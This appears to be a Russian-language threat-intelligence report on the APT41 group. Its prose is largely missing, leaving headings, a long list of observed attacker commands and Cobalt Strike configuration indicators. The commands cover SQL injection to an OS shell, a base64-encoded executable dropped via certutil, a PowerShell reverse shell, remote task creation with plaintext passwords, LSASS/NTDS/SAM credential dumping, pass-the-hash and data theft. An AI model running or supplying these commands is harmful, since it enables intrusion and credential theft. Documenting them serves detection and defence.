Кто такие APT41?
TTPs
python sqlmap.py -r [Company1_domain].txt --tamper=space2comment --random-agent -p ctl00%24ContentPlaceHolder1%24txtUserName,ctl00%24ContentPlaceHolder1%24txtPassword --os-shell
python sqlmap.py -r [Company2_domain].txt -p "ctl00%24MainContent%24txtUserName,ctl00%24MainContent%24txtPassword" --is-dba --hex
sqlmap.py -u [Company3_domain]/content.php?id=2141&sub=153 --random-agent --tamper=space2comment --time-sec=10 --current-user
python sqlmap.py -r [Company4_domain] -p "ctl00%24ContentPlaceHolder1%24txtUserName,ctl00%24ContentPlaceHolder1%24txtPassword" --file-write="/root/sqlmap/{Redacted_filename}.aspx" --file-dest="{Redacted_filepath}\\login1.aspx"
python sqlmap.py -u "http://[Company5_domain]/[redacted]/[redacted]/[redacted].php/?page1=DM&page2=TOTAL_DATA_DOWNLOAD&page3=TOTAL_DATA_DOWNLOAD" -p "page1" --file-read "/etc/passwd"
echo TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABoMELRLFEsgixRLIIsUSyCmM3dgiZRLIKYzd+CVVEsgpjN3oI0USyCFw8vgz1RLIIXDymDMVEsghcPKIM9USyCJSm/gidRLIIsUS2CQlEsgrsPJIM8USyCvg/Tgi1RLIK7Dy6DLVEsglJpY2gsUSyCAAAAAAAAAAAAAAAAAAAAAFBFAABMAQYAtL1mYAAAAAAAAAAA4AACAQsBDgAAzgAAAJIAAAAAAABpKQAAABAAAADgAAAAAEAAABAAAAACAAAFAAEAAAAAAAUAAQAAAAAAALABAAAEAAAAAAAAAgBAgQAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAAtDoBAGQAAAAAgAEAmAIAAAAAAAAAAAAAAAAAAAAAAAAAkAEABBAAAPAzAQAcAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEDQBAEAAAAAAAAAAAAAAAADgAAB0AQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALnRleHQAAADHzQAAABAAAADOAAAABAAAAAAAAAAAAAAAAAAAIAAAYC5yZGF0YQAARmMAAADgAAAAZAAAANIAAAAAAAAAAAAAAAAAAEA >> C:\dns.txt
----
echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAArwabRl+jySPpfizjo55dzae1X3d/KKe4+7q0T+mliBQ378k1qXt9Dvt59RV0gjgjlpQvNWtVuRLdjSQ/rlRsJCj8F8ZnFJGJNR7wQgIQevAy6+SrUEbOEUEoCbfx2f5g7uXEgeMoP70X+IUENSibMugn+NJFefdEEdf3VHdNg9G/BBk7HnqeO4MSlsGyfFCmiVYfLeN5WHKG2A00NxOlgw1hIi2WlsElu5WQygrymSWjPowswgyGX5Yls4HnYzrajXjXSeLP9TRjSnPETVoVLjJpyu2kEsIyE2XgOMO3Em0jZe7+TSrjXrCXtm780JCO17NRlA/f05l0vWjZmFScGNYpPuC1wuH6EsOxcliU2fD66A3iy0VGiQUONw9ahqEtpzsqQCW8UW37elJRgZJnQ194Hnpc6FUkaDvhZwUAqiHLDnvOBp0rAgKBGHpnOzE7mMAkJixmL/rKTBZ+U5NaBpjIu>> C:\dns.txt
echo 5kgXfx+Ig8S1vr8p7ifpkRNTIwypOpYrBDdptgjbLcJBcAUqEK/+D85bYT9RGiYYZ9UR4ejo6ca0B/iWEW8b+R286/evHFAXOOcuv4l8ceD1GQ9dDAPEnsbvEXGfKWfxMRv7MIieU25bK16aYOR4CRkfHphDAc7JgwxXgy8BQSjBj4H2jg4Ar4mZB4SXfD5ZKR+TIf/E6Yysh6iOrXU8BUXwdGw==>> C:\dns.txt
certutil -decode C:\dns.txt C:\dns.exe
certutil -hashfile C:\dns.exe
copy C:\dns.exe C:\WINDOWS\dns.exe
move C:\dns.exe C:\windows\mciwave.exe
echo o3wiZy3M7pERynevamNQTtL5VZf3C+vS22sRbsUgj8Lw005hIB1mVlNyvdw5GWrKgdMrpkJ2mYamD3sHBuU6yKJ8M3JwfxkkhEtSdi2WJdVfM8zhVN4xn/PPOodt/QmoPrGz3A6jvRpElAzc7HaYTIL2rVDmnniq048aZC1XXdiWCN/5MZVJCjBeSJ/OPrrh1tJ/ffo4CpzHCBaFgQMqouI4h5JHtHlyjFpyKXlGAFXv0HbtWoZhCUGURyvCYCIEnqC5oZJQsIn/drTcNhxGoTiecgF7e147rCuz7s9F5pL+8D2xn1mm8zcG0UqOPwL9bNJnGoKPkgjp5p8jZGwrt47NnaCxvtc8jPPGp3atgarOrDQixf94mx6SVZmhfCLclFvKTVPD1Af1SGdizG/jYagInD7pi4QSRZmJ9TWHz2z79/p1HpU6v8vjTkTq4I0NEwtd2NAiLKamGNtetrNqoCIlqoQIx0hjOOEsA1QPpCCDJeuzQYIcWPGNrA15GP7fw5kIqrhMMZm1UmU4X3tuIsK8E+U737rhfpJx2TpK7P/hY4oIESxTTi74qIvQgpHpRzSpBWKbVsZgr3LJutrnqQDEcO78jdymqmQE/Jer/vj3jyXjUN55oEZ/4TPuChJ7R6d6rDdrhjNmLxCCzWFYLzL4RoFwgk4ZVmFOoAiM5gOhIrqhVwsrCX+nwp5z+p+ub1Mm1UA/1hMYA7SBhHUYFMfNch+cZRQ744yQJBzxsb5ro9y+n2z4RMpAuFzOJbFe0FVGniLRnJrrGVa5KRASwrOD/AcN80fiQXRHjDvvIF272K3h6tZ+rNo21VchZ6wJMJ7t8Epa/8cmjjvLxo5OKMHiEQsRAyB+eka1fMYd/ivNVq9lvRCDwxen4XPwxO+HnfHeKQqtjBFT5RfEPpxT5tpTmbQQKveXsoWvOboTHfV3szu73LIu4QoW5K2M0iT7sKhpmqZnfJjfufgBTDDampzCe8ExTmjeSIRwWSol541opnB2VXhyebw7HRvVI3t9 >> C:\temp\bug.txt
echo Wv39JqjpZEGW7rjPYW5t09Ck9AQTc94kJ5nfTPEh6KVvRAeuMw23lQdZy/ZquMQOcy9ozRl7OyrQPtKwHYC0+pZ5Lg0Jt5DXREFurZwk0FJzMkTpxAl4iikdES2iXOvCksLVzoq3F51z3BRhMJPbOYtS5A1C0cDgPA8vQIBG3wvBhqOdnQtOqYOI+2PmvdqaVVXqOlUQjJrnf57tsYGC/j6JlOS/n/8wCqILF2+rmAh3gJRa63KLsNXk/1Em9ulNQzsJvgmsZSCtuHNPlGPC5S4oE43PdOODpevvd1qBhu/g7qZ18ZH4toavVHoS5TTBcXQhdpANYhCpdVheds/Gao8QnHrqqFDWmRVd3zTyGxtrUhFvQzvIuQFn79mWs8KjypW084WT+Azj44BX+a/vOiuSmnhzPU2afpd+xsF7o5Gl0uVSev7rI0Vvdg374Xoyr9gesnbRPIoU/PNdeOKUtXINwyjdwCjYdQtwEzuAmxk3a7QXhJ0hugafpQHQthKlib1XJ5lGL/9VU8MGg5vFvrfD8pQVEtdM3fvzH8Yz9hiA+ZAatjSpAGkO0YohS+fYFvJRT2ER4sJOX+Ofv3psj6s8wmNgMWvUWfKdHxx2qEweXGPVsC44yfv+7ahc4TIU+WC5QzS2Jjelh48e1mCUfArPpp73dbag6aGXir0SwE+s8tjnqRyLrQ6ERxaAeteVsqZhvPbx1uS+31fUqriF2agZAALfePXuvrHWMhUmV4fpnU3UbHkzQu621utSj9PR43NkwNjBIEIO2XLXKrIy+R3h/Fmv8j2IOyM9ou3+MxSLRnoB2oVL3G0R0rELlrY4+uQ3cZr7xbKXvTwwpXJX+rTXAlWkW8YPLDRwp5wq8pAUDt5P5WasvODfr/UKYSvuPaHQhbqITKmhTpht4MKzXEAynBp1JdbG3N8faLTd8HbgsHE2u1K5/i0j4OZFYqX5kqdTCgg3D+jdGYmtD5HADnIMYNz1XBDMVK1YHkjfBIX6jiQwJnPhBx5nEt4XH6Uq >> C:\temp\bug.txt
powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('{redacted}', 80);$NetworkStream = $TCPClient.GetStream();$StreamWriter = New-Object IO.StreamWriter($NetworkStream);function WriteToStream ($String) {[byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0};$StreamWriter.Write($String + 'SHELL> ');$StreamWriter.Flush()}WriteToStream '';while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {Invoke-Expression $Command 2>&1 | Out-String} catch {$_ | Out-String}WriteToStream ($Output)}$StreamWriter.Close()"
SCHTASKS /Create /S 192.168.100.19 /U "{redacted}\administrator" /P "!@#Virg0#@!" /RU SYSTEM /SC DAILY /TN Exec2022 /TR "C:\windows\system32\taskhosts.exe"
SCHTASKS /run /S 192.168.100.19 /U "{redacted}\administrator" /P "!@#Virg0#@!" /TN Exec2022
sc \\172.16.2.146 Create SuperIe binPath= "cmd.exe /k "c:\users\public\install.bat";
sc \\192.168.111.112 create res binpath="C:\PerfLogs\vmserver.exe";
sc \\192.168.111.112 start res;
sc query LxpSrvc;
sc delete LxpSrvc;
wmic /node:172.19.97.102 /user:{redacted}\{redacted} /password:P$ssw0rd0006 process call create "C:\users\Public\COMSysUpdate.exe"
wmic /node:172.21.2.177 /user:{redacted}\{redacted} /password:Passw0rd@123 process call create "c:\users\Public\install.bat"
schtasks /create /s 192.168.111.3 /u {redacted} /p {redacted} /tn dda /sc onstart /tr C:\PerfLogs\vmserver64.exe /ru system /f
SCHTASKS /Create /S 10.200.244.222 /U test\administrator /P {redacted} /RU "system" /tn rlsv /sc DAILY /tr c:\2012.bat /F
SCHTASKS /Create /S 192.168.100.19 /U "{redacted}\administrator" /P {redacted} /RU SYSTEM /SC DAILY /TN Exec2022 /TR "C:\windows\system32\taskhosts.exe"
schtasks /create /tn rlsv1 /U test\Administrator /P {redacted} /tr C:\2012.bat /sc DAILY /s 10.200.244.222 /RU system
SCHTASKS /Create /RU SYSTEM /SC ONSTART /TN Update /TR "C:\windows\system32\calc.exe"
SCHTASKS /Create /RU SYSTEM /SC ONSTART /TN dllhosts /TR "dllhosts.exe"
schtasks.exe /s 192.168.0.28 /u "administrator" /p {redacted} /Create /tn VMUSS /tr "c:\users\public\install.bat" /st 15:58 /sc once /ru system
sc \\172.26.16.81 Create SuperIe binPath= "cmd.exe /k c:\users\public\SecurityHealthSystray.exe"
sc Create syscmd binpath="cmd/k start"type= own type= interact
sc \\192.168.111.112 create res binpath="C:\PerfLogs\vmserver.exe"
sc start LxpSrvc
copy C:\temp\LxpSvc.exe "\\192.168.100.4\c$\Users\administrator.{redacted}\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LxpSvc.exe"
cmd.exe /c c:\windows\Temp\BadPotatoNet4.exe c:\windows\Temp\COMSysCon.exe;
execute-assembly C:\Users\Administrator\Desktop\SweetPotato.exe E:\Projects\Operations\uploads\documents\docs\AxInstSV.exe.
del C:\temp\LxpSvc.exe
del c:\users\public\BadPotatoNet4.exe
del \\172.16.2.21\c$\users\Public\SecurityHealthSystray.dll
del \\172.16.2.21\c$\users\Public\SecurityHealthSystra.ocx
copy "C:\Windows\System32\winevt\Logs\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx" "C:\PerfLogs\mwt.evtx"
C:\PerfLogs\mwt.evtx
rm C:\PerfLogs\mwt.evtx
icacls \\192.168.0.243\c$\www\{redacted}\test2.asp /grant IIS_IUSRS:F
ntdsutil "ac i ntds" "ifm" "create full C:\perflogs\temp" q q
ntdsutil "activate instance ntds" "ifm" "create full C:\PerfLogs\temp" quit quit
reg save HKLM\SAM C:\perflogs \sam.save
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy11\Windows\System32\config\SAM c:\users\public\SAM
procdump64.exe -accepteula -ma lsass.exe lsass.dmp
C:\mi.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit >> C:\log.tx
mimikatz's sekurlsa::logonpasswords
BrowserGhost.exe >> iis.txt
findstr /c:"User" /c:"Password" /si web.config
findstr /c:"User ID=" /c:"Password="
net user /domain > 1.txt
net user
net localgroup administrators
net accounts /domain
net group "Domain Admins"
echo %PROCESSOR_ARCHITECTURE%
systeminfo
whoami
net config Workstation
net group "Domain Admins" /domain
net group "domain Controllers"
net group "Exchange Servers"
net group "Schema Admins"
net group "Protected Users"
net group "Enterprise Admins"
net group "Enterprise Read-only Domain Controllers"
net group "Exchange Domain Servers"
reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber"
reg query "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings"
reg query "HKEY_LOCAL_MACHINE \SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{1f777394-0b42-11e3-80ad-806e6f6e6963}"
dsquery site
net time /domain
tasklist /pid 1428 /f
tasklist /s 172.16.2.132 /u test\administrator /p {redacted}
tasklist | findstr update_x64.exe
C:\PerfLogs\cping40.exe scan smbvul 10.0.0.1 10.0.10.1 > 10.txt
cping40.exe scan smbvul 192.168.20.1 192.168.29.1 > 30.txt
net share
net view /DOMAIN
reg query "HKEY_LOCAL_MACHINE \SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{1f777394-0b42-11e3-80ad-806e6f6e6963}"
netstat -ano
netstat -r
netstat -an
netstat -aon|findstr "8080"
netstat -ano | findstr dns.exe
ping -n 1 PIST-FILE-SRV
for /l %i in (1,1,255) do @ping 172.67.204.%i -w 1 -n 1|find /i "ttl="
setspn -T [target_company_name4] -Q */* | payload
setspn -T [target_company_name6] -Q */* | findstr IIS
setspn -T [target_company_name5] -Q */* | findstr SQL
setspn -T [target_company_name6] -Q */* | findstr MSSQL
mimikatz's sekurlsa::pth /user:Administrator /domain:{redacted} /ntlm:{redacted} /run:"%COMSPEC% /c echo 70c64df2976 > \\.\pipe\277bf3"
mimikatz's sekurlsa::pth /user:{redacted} /domain:{redacted} /ntlm:{redacted} /run:"%COMSPEC% /c echo 22074328564 > \\.\pipe\bce0a1"
jump psexec64 {redacted} dns
windows/beacon_dns/reverse_dns_txt (ns1.colunm.tk:53) on {redacted} via Service Control Manager (\\[redacted]\ADMIN$\c3632b3.exe)
copy c:\users\public\COMSysUpdate.exe \\172.19.97.101\c$\users\public\COMSysUpdate.exe
7z.exe a syslog.7z Intl
7z.exe a iislog.7z Intl
7z.exe a Ops.7z C:\PerfLogs\Ops\
C:\perflogs\7z.exe a -tzip C:\perflogs\nt.zip C:\perflogs\temp\
shell git clone "ssh://jenkins@{redacted}:29418/DevOps/Playbook2"
shell git clone "ssh://jenkins@{redacted}:29418/DevOps/Inventory/Cloud/Intl"
shell git clone "ssh://jenkins@192.168.0.251:29418/DevOps/Inventory"
vssadmin list shadows
vssadmin create shadow /for=c:
vssadmin delete shadows /for=c: /quiet
esentutl /p /o ntds.dit
copy "C:\Windows\System32\winevt\Logs\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx" "C:\PerfLogs\mwt.evtx"
copy "C:\Windows\System32\winevt\Logs\Microsoft-Windows-TerminalServices- RemoteConnectionManager%4Operational.evtx" "C:\PerfLogs\mwt.evtx"
rd:true /q:"*[System[(EventID=4624 or EventID=4648 or EventID=4672)] and EventData[(Data[@Name='LogonType']='2' or Data[@Name='LogonType']='10')]]"| findstr /i /c:"Date" /c:"Logon Type:" / c:"Account Name" /c:"Workstation Name:" / c:"Source Network Address"
upload C:\Users\Administrator\Desktop\cs\dns\COMSysUpdate.ocx
upload C:\Users\Administrator\Desktop\webshell\uploada4.aspx
upload c:\users\alex\desktop\smb.exe
upload C:\Users\Administrator\Desktop\cs\SecurityHealthSystray.dll
upload C:\Users\Administrator\Desktop\cs\install.bat
upload C:\Users\jack\Desktop\tmp\cs_shell\server\install.bat
upload C:\Users\jack\Desktop\tmp\cs_shell\server\bthsvc64.dll
upload C:\Users\jack\Desktop\tmp\procdump64.exe
upload C:\Users\jack\Desktop\{redacted}\244\mciwave32.dll
upload C:\Users\Admin\Desktop\{redacted}\HTTPS\LxpSvc.exe
upload C:\Users\Admin\Desktop\Webshell
upload C:\Users\Admin\Desktop\{redacted}\webshell\test4.aspx
upload C:\Users\Admin\Desktop\{redacted}\远控\service\install.bat
upload C:\Users\Admin\Desktop\{redacted}\LxpSrvc.dll
upload C:\Users\Admin\Desktop\{redacted}\远控\exe\dfss.dll
upload C:\Users\Administrator\Desktop\BadPotatoNet4.exe
Proxy : Internal Proxy - T1090.001
frcp.exe -c frcp.ini
download D:\projects\{redacted}\web.config;
download D:\projects\{redacted}\css\help.txt;
download D:\System Volume Information\002.dat;
download D:\projects\{redacted}\Web.config;
download D:\{redacted}\{redacted}20210301120008.txt;
download c:\ftpcmd.dat;
download c:\AppTextFile.txt;
download c:\Users\Administrator\Desktop\OfcNTCer.dat;
download c:\Users\{redacted}\Desktop\172.16.11.103.png;
download c:\Users\{redacted}\Desktop\FTP batch\ftp_servername.bat;
download c:\Users\{redacted}\Desktop\FTP batch\[redacted].bat;
download c:\Users\{redacted}\Desktop\tm remote chat.txt;
download c:\Temp\netstat.txt;
download c:\Program Files (x86)\Trend Micro\OfficeScan\PCCSRV\Admin\web.config;
download c:\Program Files (x86)\Trend Micro\OfficeScan\PCCSRV\Admin\Utility\SQL\web.config;
download c:\Program Files (x86)\Trend Micro\OfficeScan\PCCSRV\Web\web.config;
download c:\Program Files (x86)\Trend Micro\OfficeScan\PCCSRV\Web_OSCE\Web_console\HTML\widget_old\repository\inc\class\common\crypt\web.config ;
download c:\Windows\Microsoft.NET\Framework\v2.0.50727\ASP.NETWebAdminFiles\web.config;
download c:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\web.config;
download c:\Windows\Microsoft.NET\Framework64\v2.0.50727\ASP.NETWebAdminFiles\web.config;
download c:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\web.config;
download c:\Windows\WinSxS\amd64_clientdeployment-connectsite_31bf3856ad364e35_10.0.14393.0_none_d2443e4100c72a7c\web.config;
download c:\Users\{redacted}\Desktop\Office Scan Backup\Private\AosBackup.txt
Один из дефолтных сертификатов Cobalt Strike
Артефакты и другие интересные находки
171.208.242.0/24 CHINANET
171.208.241.0/24 CHINANET
110.191.217.0/24 CHINANET
102.223.72.0/22 SUNNETWORK-SA
103.165.84.0/24 GEM1-HK
178.79.128.0/18 US-LINODE-20100510
45.152.112.0/23 ALANYHQ
60.248.225.0/24 HINET-NET
61.221.57.0/24 HINET-NET
Заключение
IOCs
45.142.214.242:
"config_payload": {
"process-inject-stub": "fbM7aRSiLoJ01wyIz1ATTQ==",
"http-get.uri": "javaupdate.biguserup.workers.dev,/jquery-3.3.1.min.js",
"stage.cleanup": 1,
"http-get.server.output": "`T",
"post-ex.spawnto_x64": "%windir%\\sysnative\\svchost.exe -k netsvcs",
"post-ex.spawnto_x86": "%windir%\\syswow64\\svchost.exe -k netsvcs",
"watermark": 305419896,
"process-inject-use-rwx": 64,
"dns_idle": 134744072,
"sleeptime": 60000,
"publickey": "MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCY/kAU3i5Cw6hXsXbgonByGxgt0JXT5y/KjC2e0rebpLU+6cncSPuWZUo24BqPBjVD0bReKEg0dXI/WX2GJYiHHHbZ8Ecy+LdBHN9s/yRNTHeVv8JQvi4gjObGvDHf40UCG3L1NMMWp/dsdjvda/Lnqly/bgxagl4ttmViopCS1wIDAQABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==",
"maxdns": 255,
"http-post.client": "Accept: */*2Referer: https://javaupdate.biguserup.workers.dev/Accept-Encoding: *&Host: javaupdate.biguserup.workers.dev__cfduid",
"ssl": true,
"publickey_md5": "531c720aae6e053b9db9be8e7b56f78f",
"http-post.uri": "/jquery-3.2.2.min.js",
"jitter": 41,
"cookieBeacon": 1,
"port": 443,
"process-inject-start-rwx": 64,
"http-get.client": "Accept-Encoding: *&Host: javaupdate.biguserup.workers.devAccept: */*2Referer: https://javaupdate.biguserup.workers.dev/__cfduid=Cookie",
"http-get.verb": "GET",
"proxy_type": 2,
"user-agent": "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:57.0) Gecko/20100101 Firefox/57.0"
}
},
45.144.31.31:
config_payload": {
"process-inject-stub": "d5nX4wNnwCo18Wx3jr4tPg==",
"http-get.uri": "cs.colunm.tk,/__utm.gif",
"http-get.server.output": "",
"post-ex.spawnto_x64": "%windir%\\sysnative\\rundll32.exe",
"post-ex.spawnto_x86": "%windir%\\syswow64\\rundll32.exe",
"watermark": 305419896,
"process-inject-use-rwx": 64,
"sleeptime": 60000,
"publickey": "MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCBkyCWDMC1Q6VqRZIY35+iU7KtrHy9+HnzzPxCetQ5toPMCqlwQEB9hj38OnrVdGJYcvb8X36PIo8JBQSIB+ejM0xYaWwWIoLYhG1CSUJPgLc24wjjkW3/2wBuLrgTuYxNeylf75fE6cQtSeimLeHp/XjyQPfYbUQgiCSqs7KSUwIDAQABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==",
"maxdns": 255,
"http-post.client": "&Content-Type: application/octet-streamid",
"ssl": true,
"publickey_md5": "9cdb3fca6156c6cbed2f01d6431b3dfb",
"http-post.uri": "/submit.php",
"cookieBeacon": 1,
"port": 8443,
"process-inject-start-rwx": 64,
"http-get.client": "Cookie",
"http-get.verb": "GET",
"proxy_type": 2,
"user-agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MANM; MANM)"
}
45.142.212.47:
"config_payload": {
"process-inject-stub": "9LoFKCrbYlLergvfu7Ki8A==",
"http-get.uri": "mute-pond-371d.zalocdn.workers.dev,/jquery-3.3.1.min.js",
"stage.cleanup": 1,
"http-get.server.output": "`T",
"post-ex.spawnto_x64": "%windir%\\sysnative\\svchost.exe -k netsvcs",
"post-ex.spawnto_x86": "%windir%\\syswow64\\svchost.exe -k netsvcs",
"process-inject-use-rwx": 64,
"dns_idle": 134744072,
"sleeptime": 32547,
"publickey": "MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC3WFlrP6k0u+i8ozfzb2lLZHkTokxc3l8Hzysu+yF7wHEG7FSX9wC10GMQ3FDGYzgiH/0K9Rcr6B+xFXC2rlCIhM5fwC4cmJwnTJQ3eHAM13XXBiVKu1WSkV9xuV8McCamAtv4fzbMTUX5cek0xhjOCE4SDr3HMssyR+ODiovF/QIDAQABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==",
"maxdns": 255,
"http-post.client": "Accept: */*4Referer: https://mute-pond-371d.zalocdn.workers.dev/Accept-Encoding: *(Host: mute-pond-371d.zalocdn.workers.dev__cfduid",
"ssl": true,
"publickey_md5": "a9020b0e5342fb8877d2fb213802132f",
"http-post.uri": "/jquery-3.2.2.min.js",
"jitter": 41,
"cookieBeacon": 1,
"port": 443,
"process-inject-start-rwx": 64,
"http-get.client": "Accept-Encoding: *(Host: mute-pond-371d.zalocdn.workers.devAccept: */*4Referer: https://mute-pond-371d.zalocdn.workers.dev/__cfduid=Cookie",
"http-get.verb": "GET",
"proxy_type": 2,
"user-agent": "Mozilla/5.0 (Linux; Android 7.0; Pixel C Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0"
}
},
185.250.150.22:
"config_payload": {
"http-get.uri": "mute-pond-371d.zalocdn.workers.dev,/jquery-3.3.1.min.js",
"stage.cleanup": 1,
"http-get.server.output": "`T",
"post-ex.spawnto_x64": "%windir%\\sysnative\\svchost.exe -k netsvcs",
"post-ex.spawnto_x86": "%windir%\\syswow64\\svchost.exe -k netsvcs",
"process-inject-use-rwx": 64,
"dns_idle": 134744072,
"sleeptime": 32547,
"publickey": "MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCQ2/teGq2eUgU2sZjiJCCcKH7RgQrsICSgVdA9hT26lhijhrN8zcv9V5oORMREIMAjGCyAjFuVzfENnhjtDDcKeW4v1o8VFdyco91i4hD1u+TbbqXl5I5pyK0dHIC3oAnt0bAJYwidKgmyKvCjna4IGBNN7NezXvCeoPw3o+ulJQIDAQABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==",
"maxdns": 255,
"http-post.client": "Accept: */*4Referer: https://mute-pond-371d.zalocdn.workers.dev/Accept-Encoding: *(Host: mute-pond-371d.zalocdn.workers.dev__cfduid",
"ssl": true,
"publickey_md5": "398c270c67cd915134ebbf7108090789",
"http-post.uri": "/jquery-3.2.2.min.js",
"jitter": 41,
"cookieBeacon": 1,
"port": 443,
"process-inject-start-rwx": 64,
"http-get.client": "Accept-Encoding: *(Host: mute-pond-371d.zalocdn.workers.devAccept: */*4Referer: https://mute-pond-371d.zalocdn.workers.dev/__cfduid=Cookie",
"http-get.verb": "GET",
"proxy_type": 2,
"user-agent": "Mozilla/5.0 (Linux; Android 7.0; Pixel C Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0"
}